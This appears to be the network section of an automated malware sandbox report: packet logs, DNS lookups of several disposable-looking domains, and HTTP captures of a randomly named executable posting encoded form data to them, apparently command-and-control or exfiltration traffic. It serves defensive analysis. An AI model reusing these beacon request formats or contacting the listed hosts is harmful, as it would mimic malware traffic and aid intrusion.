                                                                                        Nov 1, 2024 19:43:46.219264030 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.219338894 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.219341040 CET4973880192.168.2.438.47.237.27
                                                                                        Nov 1, 2024 19:43:46.219348907 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.219356060 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.219396114 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.219405890 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.219408035 CET4973880192.168.2.438.47.237.27
                                                                                        Nov 1, 2024 19:43:46.219417095 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.219429016 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.219439030 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.219440937 CET4973880192.168.2.438.47.237.27
                                                                                        Nov 1, 2024 19:43:46.219474077 CET4973880192.168.2.438.47.237.27
                                                                                        Nov 1, 2024 19:43:46.219914913 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.219965935 CET4973880192.168.2.438.47.237.27
                                                                                        Nov 1, 2024 19:43:46.219976902 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.219988108 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.219997883 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.220021009 CET4973880192.168.2.438.47.237.27
                                                                                        Nov 1, 2024 19:43:46.220067978 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.220110893 CET4973880192.168.2.438.47.237.27
                                                                                        Nov 1, 2024 19:43:46.220140934 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.220156908 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.220169067 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.220180035 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.220191956 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.220195055 CET4973880192.168.2.438.47.237.27
                                                                                        Nov 1, 2024 19:43:46.220221996 CET4973880192.168.2.438.47.237.27
                                                                                        Nov 1, 2024 19:43:46.220741987 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.220793962 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.220796108 CET4973880192.168.2.438.47.237.27
                                                                                        Nov 1, 2024 19:43:46.220805883 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.220839977 CET4973880192.168.2.438.47.237.27
                                                                                        Nov 1, 2024 19:43:46.220899105 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.220916033 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.220927000 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.220937967 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.220949888 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.220962048 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.220962048 CET4973880192.168.2.438.47.237.27
                                                                                        Nov 1, 2024 19:43:46.220973969 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.220976114 CET4973880192.168.2.438.47.237.27
                                                                                        Nov 1, 2024 19:43:46.221004009 CET4973880192.168.2.438.47.237.27
                                                                                        Nov 1, 2024 19:43:46.221009016 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.221021891 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.221052885 CET4973880192.168.2.438.47.237.27
                                                                                        Nov 1, 2024 19:43:46.221364975 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.221385002 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.221410990 CET4973880192.168.2.438.47.237.27
                                                                                        Nov 1, 2024 19:43:46.221441984 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.221453905 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.221462965 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.221476078 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.221487999 CET4973880192.168.2.438.47.237.27
                                                                                        Nov 1, 2024 19:43:46.221506119 CET4973880192.168.2.438.47.237.27
                                                                                        Nov 1, 2024 19:43:46.221509933 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.221520901 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.221532106 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.221543074 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.221549988 CET4973880192.168.2.438.47.237.27
                                                                                        Nov 1, 2024 19:43:46.221554041 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.221566916 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.221566916 CET4973880192.168.2.438.47.237.27
                                                                                        Nov 1, 2024 19:43:46.221590042 CET4973880192.168.2.438.47.237.27
                                                                                        Nov 1, 2024 19:43:46.221661091 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.221704006 CET4973880192.168.2.438.47.237.27
                                                                                        Nov 1, 2024 19:43:46.222357035 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.222372055 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.222383022 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.222413063 CET4973880192.168.2.438.47.237.27
                                                                                        Nov 1, 2024 19:43:46.222461939 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.222471952 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.222481966 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.222492933 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.222503901 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.222511053 CET4973880192.168.2.438.47.237.27
                                                                                        Nov 1, 2024 19:43:46.222513914 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.222527981 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.222533941 CET4973880192.168.2.438.47.237.27
                                                                                        Nov 1, 2024 19:43:46.222537994 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.222543955 CET4973880192.168.2.438.47.237.27
                                                                                        Nov 1, 2024 19:43:46.222551107 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.222565889 CET4973880192.168.2.438.47.237.27
                                                                                        Nov 1, 2024 19:43:46.222598076 CET4973880192.168.2.438.47.237.27
                                                                                        Nov 1, 2024 19:43:46.229043961 CET4973880192.168.2.438.47.237.27
                                                                                        Nov 1, 2024 19:43:46.233822107 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:44:01.349040031 CET4982280192.168.2.4188.114.96.3
                                                                                        Nov 1, 2024 19:44:01.353950977 CET8049822188.114.96.3192.168.2.4
                                                                                        Nov 1, 2024 19:44:01.354062080 CET4982280192.168.2.4188.114.96.3
                                                                                        Nov 1, 2024 19:44:01.363862991 CET4982280192.168.2.4188.114.96.3
                                                                                        Nov 1, 2024 19:44:01.369484901 CET8049822188.114.96.3192.168.2.4
                                                                                        Nov 1, 2024 19:44:02.875030994 CET4982280192.168.2.4188.114.96.3
                                                                                        Nov 1, 2024 19:44:02.880579948 CET8049822188.114.96.3192.168.2.4
                                                                                        Nov 1, 2024 19:44:02.880750895 CET4982280192.168.2.4188.114.96.3
                                                                                        Nov 1, 2024 19:44:04.026787043 CET4983680192.168.2.4188.114.96.3
                                                                                        Nov 1, 2024 19:44:04.031725883 CET8049836188.114.96.3192.168.2.4
                                                                                        Nov 1, 2024 19:44:04.031816959 CET4983680192.168.2.4188.114.96.3
                                                                                        Nov 1, 2024 19:44:04.065896034 CET4983680192.168.2.4188.114.96.3
                                                                                        Nov 1, 2024 19:44:04.070780039 CET8049836188.114.96.3192.168.2.4
                                                                                        Nov 1, 2024 19:44:05.578167915 CET4983680192.168.2.4188.114.96.3
                                                                                        Nov 1, 2024 19:44:05.775711060 CET8049836188.114.96.3192.168.2.4
                                                                                        Nov 1, 2024 19:44:05.775784969 CET4983680192.168.2.4188.114.96.3
                                                                                        Nov 1, 2024 19:44:05.775818110 CET8049836188.114.96.3192.168.2.4
                                                                                        Nov 1, 2024 19:44:05.775832891 CET8049836188.114.96.3192.168.2.4
                                                                                        Nov 1, 2024 19:44:05.775844097 CET8049836188.114.96.3192.168.2.4
                                                                                        Nov 1, 2024 19:44:05.775856972 CET8049836188.114.96.3192.168.2.4
                                                                                        Nov 1, 2024 19:44:05.775880098 CET4983680192.168.2.4188.114.96.3
                                                                                        Nov 1, 2024 19:44:05.775912046 CET4983680192.168.2.4188.114.96.3
                                                                                        Nov 1, 2024 19:44:05.775927067 CET4983680192.168.2.4188.114.96.3
                                                                                        Nov 1, 2024 19:44:05.775927067 CET4983680192.168.2.4188.114.96.3
                                                                                        Nov 1, 2024 19:44:05.776304960 CET8049836188.114.96.3192.168.2.4
                                                                                        Nov 1, 2024 19:44:05.776351929 CET4983680192.168.2.4188.114.96.3
                                                                                        Nov 1, 2024 19:44:05.777925014 CET8049836188.114.96.3192.168.2.4
                                                                                        Nov 1, 2024 19:44:05.778074026 CET4983680192.168.2.4188.114.96.3
                                                                                        Nov 1, 2024 19:44:06.602042913 CET4985380192.168.2.4188.114.96.3
                                                                                        Nov 1, 2024 19:44:06.608103991 CET8049853188.114.96.3192.168.2.4
                                                                                        Nov 1, 2024 19:44:06.608177900 CET4985380192.168.2.4188.114.96.3
                                                                                        Nov 1, 2024 19:44:06.658864021 CET4985380192.168.2.4188.114.96.3
                                                                                        Nov 1, 2024 19:44:06.663814068 CET8049853188.114.96.3192.168.2.4
                                                                                        Nov 1, 2024 19:44:06.663852930 CET8049853188.114.96.3192.168.2.4
                                                                                        Nov 1, 2024 19:44:06.663863897 CET8049853188.114.96.3192.168.2.4
                                                                                        Nov 1, 2024 19:44:06.663872004 CET8049853188.114.96.3192.168.2.4
                                                                                        Nov 1, 2024 19:44:06.663887978 CET8049853188.114.96.3192.168.2.4
                                                                                        Nov 1, 2024 19:44:06.663959980 CET8049853188.114.96.3192.168.2.4
                                                                                        Nov 1, 2024 19:44:06.663971901 CET8049853188.114.96.3192.168.2.4
                                                                                        Nov 1, 2024 19:44:06.663980007 CET8049853188.114.96.3192.168.2.4
                                                                                        Nov 1, 2024 19:44:06.663984060 CET8049853188.114.96.3192.168.2.4
                                                                                        Nov 1, 2024 19:44:08.172209024 CET4985380192.168.2.4188.114.96.3
                                                                                        Nov 1, 2024 19:44:08.177539110 CET8049853188.114.96.3192.168.2.4
                                                                                        Nov 1, 2024 19:44:08.177592993 CET4985380192.168.2.4188.114.96.3
                                                                                        Nov 1, 2024 19:44:09.190468073 CET4986480192.168.2.4188.114.96.3
                                                                                        Nov 1, 2024 19:44:09.210165977 CET8049864188.114.96.3192.168.2.4
                                                                                        Nov 1, 2024 19:45:25.477786064 CET8050026103.191.208.137192.168.2.4
                                                                                        Nov 1, 2024 19:45:26.984652042 CET5002680192.168.2.4103.191.208.137
                                                                                        Nov 1, 2024 19:45:27.292041063 CET8050026103.191.208.137192.168.2.4
                                                                                        Nov 1, 2024 19:45:27.292100906 CET5002680192.168.2.4103.191.208.137
                                                                                        Nov 1, 2024 19:45:28.003776073 CET5002780192.168.2.4103.191.208.137
                                                                                        Nov 1, 2024 19:45:28.009330988 CET8050027103.191.208.137192.168.2.4
                                                                                        Nov 1, 2024 19:45:28.009454012 CET5002780192.168.2.4103.191.208.137
                                                                                        Nov 1, 2024 19:45:28.017379045 CET5002780192.168.2.4103.191.208.137
                                                                                        Nov 1, 2024 19:45:28.022589922 CET8050027103.191.208.137192.168.2.4
                                                                                        Nov 1, 2024 19:45:30.021539927 CET8050027103.191.208.137192.168.2.4
                                                                                        Nov 1, 2024 19:45:30.062782049 CET5002780192.168.2.4103.191.208.137
                                                                                        Nov 1, 2024 19:45:30.280095100 CET8050027103.191.208.137192.168.2.4
                                                                                        Nov 1, 2024 19:45:30.280575991 CET5002780192.168.2.4103.191.208.137
                                                                                        Nov 1, 2024 19:45:30.283709049 CET5002780192.168.2.4103.191.208.137
                                                                                        Nov 1, 2024 19:45:30.288522005 CET8050027103.191.208.137192.168.2.4
                                                                                        Nov 1, 2024 19:45:35.301605940 CET5002880192.168.2.43.111.160.216
                                                                                        Nov 1, 2024 19:45:35.306608915 CET80500283.111.160.216192.168.2.4
                                                                                        Nov 1, 2024 19:45:35.306682110 CET5002880192.168.2.43.111.160.216
                                                                                        Nov 1, 2024 19:45:35.319185019 CET5002880192.168.2.43.111.160.216
                                                                                        Nov 1, 2024 19:45:35.324166059 CET80500283.111.160.216192.168.2.4
                                                                                        Nov 1, 2024 19:45:36.381829023 CET80500283.111.160.216192.168.2.4
                                                                                        Nov 1, 2024 19:45:36.437601089 CET5002880192.168.2.43.111.160.216
                                                                                        Nov 1, 2024 19:45:36.614161015 CET80500283.111.160.216192.168.2.4
                                                                                        Nov 1, 2024 19:45:36.615777016 CET5002880192.168.2.43.111.160.216
                                                                                        Nov 1, 2024 19:45:36.831708908 CET5002880192.168.2.43.111.160.216
                                                                                        Nov 1, 2024 19:45:37.847050905 CET5002980192.168.2.43.111.160.216
                                                                                        Nov 1, 2024 19:45:37.852035999 CET80500293.111.160.216192.168.2.4
                                                                                        Nov 1, 2024 19:45:37.852118969 CET5002980192.168.2.43.111.160.216
                                                                                        Nov 1, 2024 19:45:37.862956047 CET5002980192.168.2.43.111.160.216
                                                                                        Nov 1, 2024 19:45:37.867793083 CET80500293.111.160.216192.168.2.4
                                                                                        Nov 1, 2024 19:45:38.926793098 CET80500293.111.160.216192.168.2.4
                                                                                        Nov 1, 2024 19:45:38.984457970 CET5002980192.168.2.43.111.160.216
                                                                                        Nov 1, 2024 19:45:39.183108091 CET80500293.111.160.216192.168.2.4
                                                                                        Nov 1, 2024 19:45:39.183809042 CET5002980192.168.2.43.111.160.216
                                                                                        Nov 1, 2024 19:45:39.375154018 CET5002980192.168.2.43.111.160.216
                                                                                        Nov 1, 2024 19:45:40.395721912 CET5003080192.168.2.43.111.160.216
                                                                                        Nov 1, 2024 19:45:40.402205944 CET80500303.111.160.216192.168.2.4
                                                                                        Nov 1, 2024 19:45:40.403172970 CET5003080192.168.2.43.111.160.216
                                                                                        Nov 1, 2024 19:45:40.415122986 CET5003080192.168.2.43.111.160.216
                                                                                        Nov 1, 2024 19:45:40.420056105 CET80500303.111.160.216192.168.2.4
                                                                                        Nov 1, 2024 19:45:40.420126915 CET80500303.111.160.216192.168.2.4
                                                                                        Nov 1, 2024 19:45:40.420133114 CET80500303.111.160.216192.168.2.4
                                                                                        Nov 1, 2024 19:45:40.420202017 CET80500303.111.160.216192.168.2.4
                                                                                        Nov 1, 2024 19:45:40.420207024 CET80500303.111.160.216192.168.2.4
                                                                                        Nov 1, 2024 19:45:40.420610905 CET80500303.111.160.216192.168.2.4
                                                                                        Nov 1, 2024 19:45:40.420686007 CET80500303.111.160.216192.168.2.4
                                                                                        Nov 1, 2024 19:45:40.420835018 CET80500303.111.160.216192.168.2.4
                                                                                        Nov 1, 2024 19:45:40.420871019 CET80500303.111.160.216192.168.2.4
                                                                                        Nov 1, 2024 19:45:41.508430958 CET80500303.111.160.216192.168.2.4
                                                                                        Nov 1, 2024 19:45:41.671963930 CET5003080192.168.2.43.111.160.216
                                                                                        Nov 1, 2024 19:45:41.752641916 CET80500303.111.160.216192.168.2.4
                                                                                        Nov 1, 2024 19:45:41.752712965 CET5003080192.168.2.43.111.160.216
                                                                                        Nov 1, 2024 19:45:41.922238111 CET5003080192.168.2.43.111.160.216
                                                                                        Nov 1, 2024 19:45:42.943715096 CET5003180192.168.2.43.111.160.216
                                                                                        Nov 1, 2024 19:45:42.948769093 CET80500313.111.160.216192.168.2.4
                                                                                        Nov 1, 2024 19:45:42.948854923 CET5003180192.168.2.43.111.160.216
                                                                                        Nov 1, 2024 19:45:42.955718040 CET5003180192.168.2.43.111.160.216
                                                                                        Nov 1, 2024 19:45:42.960608959 CET80500313.111.160.216192.168.2.4
                                                                                        Nov 1, 2024 19:45:44.023185015 CET80500313.111.160.216192.168.2.4
                                                                                        Nov 1, 2024 19:45:44.078738928 CET5003180192.168.2.43.111.160.216
                                                                                        Nov 1, 2024 19:45:44.256689072 CET80500313.111.160.216192.168.2.4
                                                                                        Nov 1, 2024 19:45:44.259905100 CET5003180192.168.2.43.111.160.216
                                                                                        Nov 1, 2024 19:45:44.263720989 CET5003180192.168.2.43.111.160.216
                                                                                        Nov 1, 2024 19:45:44.268620968 CET80500313.111.160.216192.168.2.4
                                                                                        Nov 1, 2024 19:45:49.286375046 CET5003280192.168.2.4203.161.49.193
                                                                                        Nov 1, 2024 19:45:49.291261911 CET8050032203.161.49.193192.168.2.4
                                                                                        Nov 1, 2024 19:45:49.291316986 CET5003280192.168.2.4203.161.49.193
                                                                                        Nov 1, 2024 19:45:49.304497004 CET5003280192.168.2.4203.161.49.193
                                                                                        Nov 1, 2024 19:45:49.309598923 CET8050032203.161.49.193192.168.2.4
                                                                                        Nov 1, 2024 19:45:50.008357048 CET8050032203.161.49.193192.168.2.4
                                                                                        Nov 1, 2024 19:45:50.047466993 CET8050032203.161.49.193192.168.2.4
                                                                                        Nov 1, 2024 19:45:50.047522068 CET5003280192.168.2.4203.161.49.193
                                                                                        Nov 1, 2024 19:45:50.812665939 CET5003280192.168.2.4203.161.49.193
                                                                                        Nov 1, 2024 19:45:52.191390038 CET5003380192.168.2.4203.161.49.193
                                                                                        Nov 1, 2024 19:45:52.196249008 CET8050033203.161.49.193192.168.2.4
                                                                                        Nov 1, 2024 19:45:52.196346045 CET5003380192.168.2.4203.161.49.193
                                                                                        Nov 1, 2024 19:45:52.207448006 CET5003380192.168.2.4203.161.49.193
                                                                                        Nov 1, 2024 19:45:52.212407112 CET8050033203.161.49.193192.168.2.4
                                                                                        Nov 1, 2024 19:45:52.906157970 CET8050033203.161.49.193192.168.2.4
                                                                                        Nov 1, 2024 19:45:52.943828106 CET8050033203.161.49.193192.168.2.4
                                                                                        Nov 1, 2024 19:45:52.949935913 CET5003380192.168.2.4203.161.49.193
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 1, 2024 19:43:45.138778925 CET | 192.168.2.4 | 1.1.1.1 | 0x687 | Standard query (0) | www.iuyi542.xyz | A (IP address) | IN (0x0001) | false
Nov 1, 2024 19:44:01.310710907 CET | 192.168.2.4 | 1.1.1.1 | 0x455d | Standard query (0) | www.vrxlzluy.shop | A (IP address) | IN (0x0001) | false
Nov 1, 2024 19:44:15.753459930 CET | 192.168.2.4 | 1.1.1.1 | 0xcc5d | Standard query (0) | www.trifecta.center | A (IP address) | IN (0x0001) | false
Nov 1, 2024 19:44:29.065922976 CET | 192.168.2.4 | 1.1.1.1 | 0x5e67 | Standard query (0) | www.wcp95.top | A (IP address) | IN (0x0001) | false
Nov 1, 2024 19:44:43.348716021 CET | 192.168.2.4 | 1.1.1.1 | 0x4efd | Standard query (0) | www.gokulmohan.online | A (IP address) | IN (0x0001) | false
Nov 1, 2024 19:44:57.212191105 CET | 192.168.2.4 | 1.1.1.1 | 0x2ff3 | Standard query (0) | www.wddb97.top | A (IP address) | IN (0x0001) | false
Nov 1, 2024 19:45:11.301551104 CET | 192.168.2.4 | 1.1.1.1 | 0x140 | Standard query (0) | www.xtelify.tech | A (IP address) | IN (0x0001) | false
Nov 1, 2024 19:45:19.364027977 CET | 192.168.2.4 | 1.1.1.1 | 0xe1fd | Standard query (0) | www.roopiedutech.online | A (IP address) | IN (0x0001) | false
Nov 1, 2024 19:45:35.285450935 CET | 192.168.2.4 | 1.1.1.1 | 0xae7 | Standard query (0) | www.comvq.fun | A (IP address) | IN (0x0001) | false
Nov 1, 2024 19:45:49.269638062 CET | 192.168.2.4 | 1.1.1.1 | 0x3e01 | Standard query (0) | www.harmonid.life | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 1, 2024 19:43:45.152220964 CET | 1.1.1.1 | 192.168.2.4 | 0x687 | No error (0) | www.iuyi542.xyz | iuyi542.xyz | | CNAME (Canonical name) | IN (0x0001) | false
Nov 1, 2024 19:43:45.152220964 CET | 1.1.1.1 | 192.168.2.4 | 0x687 | No error (0) | iuyi542.xyz | | 38.47.237.27 | A (IP address) | IN (0x0001) | false
Nov 1, 2024 19:44:01.320707083 CET | 1.1.1.1 | 192.168.2.4 | 0x455d | No error (0) | www.vrxlzluy.shop | | 188.114.96.3 | A (IP address) | IN (0x0001) | false
Nov 1, 2024 19:44:01.320707083 CET | 1.1.1.1 | 192.168.2.4 | 0x455d | No error (0) | www.vrxlzluy.shop | | 188.114.97.3 | A (IP address) | IN (0x0001) | false
Nov 1, 2024 19:44:15.766205072 CET | 1.1.1.1 | 192.168.2.4 | 0xcc5d | No error (0) | www.trifecta.center | trifecta.center | | CNAME (Canonical name) | IN (0x0001) | false
Nov 1, 2024 19:44:15.766205072 CET | 1.1.1.1 | 192.168.2.4 | 0xcc5d | No error (0) | trifecta.center | | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Nov 1, 2024 19:44:15.766205072 CET | 1.1.1.1 | 192.168.2.4 | 0xcc5d | No error (0) | trifecta.center | | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Nov 1, 2024 19:44:29.482215881 CET | 1.1.1.1 | 192.168.2.4 | 0x5e67 | No error (0) | www.wcp95.top | wcp95.top | | CNAME (Canonical name) | IN (0x0001) | false
Nov 1, 2024 19:44:29.482215881 CET | 1.1.1.1 | 192.168.2.4 | 0x5e67 | No error (0) | wcp95.top | | 154.23.184.95 | A (IP address) | IN (0x0001) | false
Nov 1, 2024 19:44:43.359234095 CET | 1.1.1.1 | 192.168.2.4 | 0x4efd | No error (0) | www.gokulmohan.online | | 172.67.185.22 | A (IP address) | IN (0x0001) | false
Nov 1, 2024 19:44:43.359234095 CET | 1.1.1.1 | 192.168.2.4 | 0x4efd | No error (0) | www.gokulmohan.online | | 104.21.64.124 | A (IP address) | IN (0x0001) | false
Nov 1, 2024 19:44:57.390842915 CET | 1.1.1.1 | 192.168.2.4 | 0x2ff3 | No error (0) | www.wddb97.top | wddb97.top | | CNAME (Canonical name) | IN (0x0001) | false
Nov 1, 2024 19:44:57.390842915 CET | 1.1.1.1 | 192.168.2.4 | 0x2ff3 | No error (0) | wddb97.top | | 206.119.82.172 | A (IP address) | IN (0x0001) | false
Nov 1, 2024 19:45:11.308634043 CET | 1.1.1.1 | 192.168.2.4 | 0x140 | Name error (3) | www.xtelify.tech | none | none | A (IP address) | IN (0x0001) | false
Nov 1, 2024 19:45:20.355298996 CET | 1.1.1.1 | 192.168.2.4 | 0xe1fd | No error (0) | www.roopiedutech.online | roopiedutech.online | | CNAME (Canonical name) | IN (0x0001) | false
Nov 1, 2024 19:45:20.355298996 CET | 1.1.1.1 | 192.168.2.4 | 0xe1fd | No error (0) | roopiedutech.online | | 103.191.208.137 | A (IP address) | IN (0x0001) | false
Nov 1, 2024 19:45:35.298808098 CET | 1.1.1.1 | 192.168.2.4 | 0xae7 | No error (0) | www.comvq.fun | | 3.111.160.216 | A (IP address) | IN (0x0001) | false
Nov 1, 2024 19:45:49.282291889 CET | 1.1.1.1 | 192.168.2.4 | 0x3e01 | No error (0) | www.harmonid.life | | 203.161.49.193 | A (IP address) | IN (0x0001) | false
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49738 | 38.47.237.27 | 80 | 4340 | C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exe
Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 19:43:45.170517921 CET | 446 | OUT | GET /b6lw/?XbDhGVR=FO9SkkJ/zSkBY2gKE3XjGE22XLVH89fAFT5UFdCZW5l7B5PRw+4+Jbotmp48rM/okqGzRuEUvPhZhQzUiZGHGB1tKbDdMwj50dTtgpwp3v/R5pIWGJdc6oQ=&Qz=BJvp0BdhxXiTCTGP HTTP/1.1
                                                                                        Host: www.iuyi542.xyz
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                        Accept-Language: en-us
                                                                                        Connection: close
                                                                                        User-Agent: Mozilla/5.0 (X11; U; Linux i686; sk; rv:1.9.0.4) Gecko/2008111217 Fedora/3.0.4-1.fc10 Firefox/3.0.4
Nov 1, 2024 19:43:45.850938082 CET | 170 | IN | HTTP/1.1 404 Not Found
                                                                                        Server: nginx
                                                                                        Date: Fri, 01 Nov 2024 18:43:45 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 167433
                                                                                        Connection: close
                                                                                        ETag: "652641ca-28e09"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49822 | 188.114.96.3 | 80 | 4340 | C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exe
Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 19:44:01.363862991 CET | 710 | OUT | POST /o91n/ HTTP/1.1
Host: www.vrxlzluy.shop
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-us
Cache-Control: no-cache
Connection: close
Content-Length: 204
Content-Type: application/x-www-form-urlencoded
Origin: http://www.vrxlzluy.shop
Referer: http://www.vrxlzluy.shop/o91n/
User-Agent: Mozilla/5.0 (X11; U; Linux i686; sk; rv:1.9.0.4) Gecko/2008111217 Fedora/3.0.4-1.fc10 Firefox/3.0.4
Data Ascii: XbDhGVR=ejBa2YGtPeopIAdujt1paAR35CXXmyaI/m5YHYnQ7tKQsr+ZH++LBUHyLl8fS9gz6mHLBcge3Wuw4+EEybPYV+oyEwkxItMKHvXFOkFamNyIWGdXa4oKtlZTQV0kahvvKPy2Ntzrlvb/d4svaHZgGRl/HDf20UTPQcVrZcBZuZOXBOepkhiST22u4ML2saO9jw==


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49836 | 188.114.96.3 | 80 | 4340 | C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exe
Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 19:44:04.065896034 CET | 730 | OUT | POST /o91n/ HTTP/1.1
Host: www.vrxlzluy.shop
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-us
Cache-Control: no-cache
Connection: close
Content-Length: 224
Content-Type: application/x-www-form-urlencoded
Origin: http://www.vrxlzluy.shop
Referer: http://www.vrxlzluy.shop/o91n/
User-Agent: Mozilla/5.0 (X11; U; Linux i686; sk; rv:1.9.0.4) Gecko/2008111217 Fedora/3.0.4-1.fc10 Firefox/3.0.4
Data Ascii: XbDhGVR=ejBa2YGtPeopJjFuhKBpLQR0lSXXoSaM/m1YHcXA7feQvJWZWP+LAUHyEF8QYdg86mDcBdce3XOw46UEyonfUuo0MQkkVdMKHvXFOk50mNqIW2NXIKMFulZQAF0kehuHKPyENu3Rltj/d5cvZWZjPRl5aTe10l2aI+k9RvReopeDAITz1QDFB2SdlLCChZz04w2rmFmbYuVCpgD1VrMY8pI=
Nov 1, 2024 19:44:05.775711060 CET | 1236 | IN | HTTP/1.1 404 Not Found
Date: Fri, 01 Nov 2024 18:44:05 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
x-litespeed-tag: 59f_HTTP.404
expires: Wed, 11 Jan 1984 05:00:00 GMT
cache-control: no-cache, must-revalidate, max-age=0
link: <https://vrxlzluy.shop/wp-json/>; rel="https://api.w.org/"
x-litespeed-cache-control: no-cache
vary: Accept-Encoding
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Qi4iazdXf1iKb89srG2XEeCpcZJgKo8iV4%2BAeVMLlEaOYaTWywMWhh2IHd2oqi1aqr5Nek7q%2B%2FH1mBATRGL5FXfLSoPag%2BBlZlfEwWAVgQr2smQnNXbY1lqJAoWaWqBLC1nSAg%3D%3D"}],"group":"cf-nel","max_age":604800}
